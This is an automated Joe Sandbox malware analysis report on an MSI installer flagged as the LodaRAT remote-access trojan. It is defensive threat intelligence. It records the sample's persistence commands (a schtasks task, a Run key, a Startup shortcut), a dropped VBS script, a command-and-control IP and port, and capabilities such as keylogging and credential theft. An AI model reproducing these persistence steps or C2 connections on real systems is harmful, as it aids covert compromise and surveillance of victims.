Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sdlvrr.msi

Overview

General Information

Sample name:sdlvrr.msi
Analysis ID:1582342
MD5:3e83644e86d6165d35a80650d01df249
SHA1:f3f82555822edc27b3ec559686e7d7b23153761b
SHA256:5cbae41670f29829cbbeb50560a2184385e25c109dcbf3bfcff6656bfc09ae32
Tags:knkbkk212msiuser-JAMESWT_MHT
Infos:

Detection

LodaRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7664 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sdlvrr.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7696 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • MSI4976.tmp (PID: 7764 cmdline: "C:\Windows\Installer\MSI4976.tmp" MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
      • cmd.exe (PID: 7812 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7864 cmdline: schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 7852 cmdline: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs MD5: FF00E0480075B095948000BDC66E81F0)
  • SRACMB.exe (PID: 7916 cmdline: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • SRACMB.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe" MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • SRACMB.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe" MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • SRACMB.exe (PID: 5296 cmdline: "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe" MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • SRACMB.exe (PID: 3648 cmdline: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • SRACMB.exe (PID: 7544 cmdline: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe MD5: 8C36CF56C0AA2ED05B8EC53CA0BFBAE1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\VYZSPQ.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000006.00000002.2614707550.0000000003830000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
      00000006.00000002.2614274905.00000000032A7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
        00000003.00000002.2616737221.0000000004AC6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
          00000006.00000002.2614274905.00000000032C7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
            Process Memory Space: MSI4976.tmp PID: 7764JoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
              Click to see the 3 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Potentially Suspicious Malware Callback Communication
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DesusertionIp: 172.111.138.100, DesusertionIsIpv6: false, DesusertionPort: 5552, EventID: 3, Image: C:\Windows\Installer\MSI4976.tmp, Initiated: true, ProcessId: 7764, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49817
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI4976.tmp", ParentImage: C:\Windows\Installer\MSI4976.tmp, ParentProcessId: 7764, ParentProcessName: MSI4976.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, ProcessId: 7852, ProcessName: wscript.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI4976.tmp", ParentImage: C:\Windows\Installer\MSI4976.tmp, ParentProcessId: 7764, ParentProcessName: MSI4976.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, ProcessId: 7852, ProcessName: wscript.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI4976.tmp", ParentImage: C:\Windows\Installer\MSI4976.tmp, ParentProcessId: 7764, ParentProcessName: MSI4976.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, ProcessId: 7852, ProcessName: wscript.exe
              Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Installer\MSI4976.tmp", ParentImage: C:\Windows\Installer\MSI4976.tmp, ParentProcessId: 7764, ParentProcessName: MSI4976.tmp, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, ProcessId: 7812, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe", EventID: 13, EventType: SetValue, Image: C:\Windows\Installer\MSI4976.tmp, ProcessId: 7764, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VYZSPQ
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Installer\MSI4976.tmp, ProcessId: 7764, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VYZSPQ.lnk
              Sigma detected: Suspicious Schtasks From Env Var Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, CommandLine: schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7812, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1, ProcessId: 7864, ProcessName: schtasks.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Installer\MSI4976.tmp", ParentImage: C:\Windows\Installer\MSI4976.tmp, ParentProcessId: 7764, ParentProcessName: MSI4976.tmp, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs, ProcessId: 7852, ProcessName: wscript.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949984172.111.138.1005552TCP
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949976172.111.138.1005552TCP
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949983172.111.138.1005552TCP
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949985172.111.138.1005552TCP
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949977172.111.138.1005552TCP
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949979172.111.138.1005552TCP
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949980172.111.138.1005552TCP
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949869172.111.138.1005552TCP
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949981172.111.138.1005552TCP
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949982172.111.138.1005552TCP
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949817172.111.138.1005552TCP
              2024-12-30T11:35:24.387568+010028498851Malware Command and Control Activity Detected192.168.2.949929172.111.138.1005552TCP
              2024-12-30T11:35:41.848807+010028498851Malware Command and Control Activity Detected192.168.2.949817172.111.138.1005552TCP
              2024-12-30T11:35:51.094216+010028498851Malware Command and Control Activity Detected192.168.2.949869172.111.138.1005552TCP
              2024-12-30T11:36:00.201860+010028498851Malware Command and Control Activity Detected192.168.2.949929172.111.138.1005552TCP
              2024-12-30T11:36:09.217517+010028498851Malware Command and Control Activity Detected192.168.2.949976172.111.138.1005552TCP
              2024-12-30T11:36:18.283230+010028498851Malware Command and Control Activity Detected192.168.2.949977172.111.138.1005552TCP
              2024-12-30T11:36:27.296276+010028498851Malware Command and Control Activity Detected192.168.2.949979172.111.138.1005552TCP
              2024-12-30T11:36:36.378336+010028498851Malware Command and Control Activity Detected192.168.2.949980172.111.138.1005552TCP
              2024-12-30T11:36:45.679041+010028498851Malware Command and Control Activity Detected192.168.2.949981172.111.138.1005552TCP
              2024-12-30T11:36:59.623794+010028498851Malware Command and Control Activity Detected192.168.2.949982172.111.138.1005552TCP
              2024-12-30T11:37:09.091777+010028498851Malware Command and Control Activity Detected192.168.2.949983172.111.138.1005552TCP
              2024-12-30T11:37:18.155276+010028498851Malware Command and Control Activity Detected192.168.2.949984172.111.138.1005552TCP
              2024-12-30T11:37:27.170694+010028498851Malware Command and Control Activity Detected192.168.2.949985172.111.138.1005552TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeReversingLabs: Detection: 52%
              Source: C:\Windows\Installer\MSI4976.tmpReversingLabs: Detection: 52%
              Multi AV Scanner detection for submitted file
              Source: sdlvrr.msiVirustotal: Detection: 50%Perma Link
              Source: sdlvrr.msiReversingLabs: Detection: 42%
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeJoe Sandbox ML: detected
              Source: C:\Windows\Installer\MSI4976.tmpJoe Sandbox ML: detected
              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeFile opened: c:Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0033DD92 GetFileAttributesW,FindFirstFileW,FindClose,3_2_0033DD92
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00372044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00372044
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0037219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0037219F
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_003724A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_003724A9
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00366B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,3_2_00366B3F
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00366E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,3_2_00366E4A
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,3_2_0036F350
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036FD47 FindFirstFileW,FindClose,3_2_0036FD47
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0036FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,3_2_0036FDD2
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_00102044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_00102044
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_0010219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_0010219F
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_001024A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_001024A9
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000F6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,8_2_000F6B3F
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000F6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,8_2_000F6E4A
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000FF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,8_2_000FF350
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000FFD47 FindFirstFileW,FindClose,8_2_000FFD47
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000CDD92 GetFileAttributesW,FindFirstFileW,FindClose,8_2_000CDD92
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000FFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,8_2_000FFDD2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49869 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49817 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49929 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49977 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49984 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49976 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49982 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49979 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49985 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49981 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49980 -> 172.111.138.100:5552
              Source: Network trafficSuricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.9:49983 -> 172.111.138.100:5552
              Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0037550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,3_2_0037550C
